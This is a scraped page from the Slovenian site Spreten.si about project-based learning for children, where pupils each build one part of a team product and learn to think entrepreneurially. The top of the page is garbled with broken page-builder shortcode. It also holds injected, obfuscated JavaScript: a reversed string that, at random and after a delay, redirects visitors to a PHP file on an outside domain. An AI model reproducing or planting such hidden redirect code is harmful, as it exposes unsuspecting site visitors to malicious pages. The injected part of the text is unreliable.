Select Page
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_width=”off” width_unit=”off” custom_width_px=”1080px” custom_width_percent=”80%” make_equal=”off” use_custom_gutter=”off” fullwidth=”off” specialty=”off” admin_label=”section” disabled=”off”]
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_width=”off” width_unit=”off” custom_width_px=”1080px” custom_width_percent=”80%” use_custom_gutter=”off” gutter_width=”3″ padding_mobile=”off” allow_player_pause=”off” parallax=”off” parallax_method=”on” make_equal=”off” column_padding_mobile=”on” parallax_1=”off” parallax_method_1=”on” parallax_2=”off” parallax_method_2=”on” parallax_3=”off” parallax_method_3=”on” parallax_4=”off” parallax_method_4=”on” admin_label=”row” disabled=”off”]

Projektno izdelovalno učenje


Prvo vodilo Spreten.si: učimo se stvari, ki nam omogočajo izdelovanje. Naš cilj so izdelki in to imenujemo ustvarjanje, to je nastajanje nečesa novega, konkretnega, po možnosti uporabnega. Ustvarjanje ni zgolj “kreativnost”.

Drugo vodilo Spreten.si: ustvarjanje oz. izdelovanje pogosto presega posameznika in časovno enoto, v kateri se začne. Zato delamo projektno:

  • Sodelovanje otrok poteka tako, da je vsak otrok zadolžen za en del izdelave in sestavlja team oz. ekipo. Iz posameznih delov na koncu nastane celota.
  • Delo pogosto traja daljše časovno obdobje, zato ga načrtujemo, sproti beležimo in na koncu ovrednotimo oz. reflektiramo.

Iz teh dveh prvin nastane prava mala organizacija.

Skozi odločanje, katero idejo bodo uresničlili, da bodo uspeli pravočasno narediti izdelek, otroci razmišljajo podjetno. Kdor se je lotil ideje, ki je ni uspel pravočasno uresniliti, in kdor je na hitro naredil izdelek, ki je slabši od drugih, še ni razmišljal najbolj podjetno. Pri Spreten.si ga usmerjamo v podjetno razmišljanje.